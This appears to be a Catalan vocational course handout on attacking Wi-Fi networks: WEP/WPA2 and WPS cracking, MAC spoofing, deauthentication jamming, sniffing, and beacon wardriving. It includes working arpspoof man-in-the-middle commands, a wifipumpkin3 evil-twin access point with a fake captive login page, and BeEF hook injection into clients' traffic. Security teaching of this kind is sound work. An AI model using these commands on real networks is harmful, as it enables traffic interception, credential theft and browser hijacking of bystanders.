Mòdul Professional 5: A04 - Atacs a xarxes inal·làmbriques

Índex

1 Objectius

2 Enunciat

2.1 Atacs "normals" a APs

2.1.1 Atac a WEP

Taller pràctic amb wifite2.

2.1.2 Atac a WPA2

Taller pràctic amb wifite2.

2.1.3 Filtratge per MAC

  1. Wireshark per esniffar el tràfic i localitzar un client ja connectat a la Wifi objectiu.
  2. Utilitzar macspoof o similar per canviar la nostre MAC per la del client ja connectat.

Això ens donarà accés a la xarxa, de fet el mateix que tingui el client al que l'hi hem pres la MAC, però hem de tenir en compte que a nivell de capa 2 la xarxa pot tenir problemes per enrutar paquets ja que té dos clients amb la mateixa MAC.

2.1.4 Ocultació de la SSID

Simplement posant la targeta wifi en mode monitor i utilitzant un sniffer de xarxa com wireshark o airodump-ng veurem la WiFi amb la seva BSSID i els clients connectats. Per molt que no envii Beacons el tràfic continua veient-se igualment.

2.1.5 Jamming

Realitzar un script python que donada una MAC client, el BSSID del AP i la interfície wifi a utilitzar llançi de forma indefinida paquets de desautenticació.

2.1.6 Funcionalitat WPS

Es tracta d'una funcionalitat d'aparells WiFi orientada a facilitar la connectivitat. Es tracta d'un botó físic, tant en el AP com en el client, que en apretar-ho i durant l'interval d'uns segons, s'intercanvien la configuració de la xarxa.

El problema resideix en que utilitza un codi d'autentificació d'uns pocs dígits numèrics, i per tant és molt fàcil realitzar un atac de força bruta.

2.2 Mode monitor + sniffing

Com hem parlat, la principal feblesa d'aquestes xarxes és el mitjà compartit (l'aire) i això permet inicialment tenir accés a tot el tràfic. Per fer-ho cal configurar la targeta de xarxa en mode monitor, no totes ho permeten.

arimon-ng start wlan0 #iniciar mode monitor
iwconfig #verificar l'estat

Un cop fet, utilitzar varies eines per extreure informació, o simplement un sniffer com wireshark.

  • Qui està aprop (mitjançant la MAC).
  • Clients (tipus, fabricants, activitat).
  • On han estat connectats els dispositius prèviament (Beacons).
  • Xarxes i característiques.
  • Qui està connectat i en quina xarxa.

2.2.1 Beacons i wardriving

  • SamCater: Un petit blog sobre la captura de beacons i l'anàlisis amb wireshark.
  • WAYB (Where Are You Been): Eina per capturar beacons, esbrinar fabricants i plotejar les beacons dels clients a Google Maps.

Amb wireshark localitzar els beacons és tan simple com afegir un filtre semblant al següent:

wlan.fc.type_subtype eq 4 && wlan.ssid != ""

A partir d'aquí veurem totes les beacons circulant, si trobem un client especialment interessant podem filtrar també per MAC.

Un cop localitzem beacons que ens interessen localitzar, podem utilitzar serveis de wardriving per veure si tenim sort i els tenen mapejats. Una opció és utiltizar Wigle, ja que podem aportar captures de wardriving amb la seva app d'Androi i utilitzar la seva interfície web o API per mapejar mitjançant SSID o BSSID les beacons que estem trobant.

2.3 Wifis públiques

2.3.1 Evadir portals captius

macspoofing.

2.3.2 Ús segur de xarxes públiques

Túnels VPN amb SSH o altres i tècniques per saltrar filtres i tallafocs.

2.3.3 Atacs entre clients (mateix segment de xarxa)

Com atacs directes fem referència al fet de que tant l'atacant com la possible víctima formen part de la mateixa xarxa i per tant tenen accés l'ún a altre. Així doncs s'obre la possibilitat de realitzar qualsevol atac del que veurem en el següent nucli formatiu de hacking de sistemes i xarxes.

  1. Sniffing i MITM

    Donat que les xarxes obertes, o públiques, no utilitzen normalment un protocol de xifrat, podrem veure tot el seu tràfic broadcast de forma clara. Tanmateix si volem interceptar el tràcif dun client/victima concreta haurem d'utilitzar les tècniques més classiques d'entorns conmutats (normalment xarxes amb fils) per aconseguir que el tràfic passi per nosaltres.

    Podem utilitzar les típiques eines per fer un atac MITM com per exemple utilitzant la tècnica de arp spoofing amb arpspoof contingut al paquet dsniff

    apt install dsniff -y
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 <IP_CLIENT> <IP_GATEWAY>
    arpspoof -i wlan0 <IP_GATEWAY> <IP_CLIENT> #En un altre terminal
    
  2. Intercepció de tràfic

    Sense un MITM podem veure el tràfic broadcast generat per tots els clients i AP, però si hem fet un MITM veurem tot el tràfic de la víctima. Per tant podrem utilitzar tècniques i eines per esnifar el tràfic, desxifrar-lo i/o modificar-lo.

    Donat que les xarxes obertes no xifren el tràfic, "tan sols" haurem de batallar amb el possible tràfic xifrat amb SSH de serveis com HTTPs. Aquest tipus d'atacs els veurem més a fons quan fem hacking a sistemes i xarxes, però a mode d'anticipació podeu veure l'eina MITMproxy.

2.4 Evil Twin / Rogue AP

sudo wifipumpkin3
ap
set ssid freeWifi
set interface wlan0
ap
proxies
set proxy captiveflask
proxies
set captiveflask.DarkLogin true
proxies
start

2.5 Javascript Bootnet

A tall d'exemple, i fent un Man in the Tab utilitzarem Beef. Però com podem veure en les opcions podem carregar qualsevol js (cirptominer, bootnet, etc) i també tenim opcions per injectar html o "canviar" arxius pdf, exe, etc per d'altres que continguin una backdoor o un RAT com pot ser EMPIRE. Instal·lem i executem Beef:

sudo apt install beef beef-xss
sudo beef-xss
firefox http://127.0.0.1:3000/ui/panel

Amb Wifipumpkin3

ap
set ssid freeWifi
set interface wlan0
ap
proxies
set proxy pumpkinproxy
proxies
set pumpkinproxy.beef true
set pumpkinproxy.beef.url_hook http://10.0.0.1:3000/hook.js
info pumpkinproxy
start

3 Entrega i Avaluació

Es realitzarà un test per valorar l'assoliment dels continguts.

4 Repàs i Millora

Data: 2022-05-08 dg. 00:00

Autor: Raul Gimenez Herrada

Created: 2021-11-04 dj. 12:26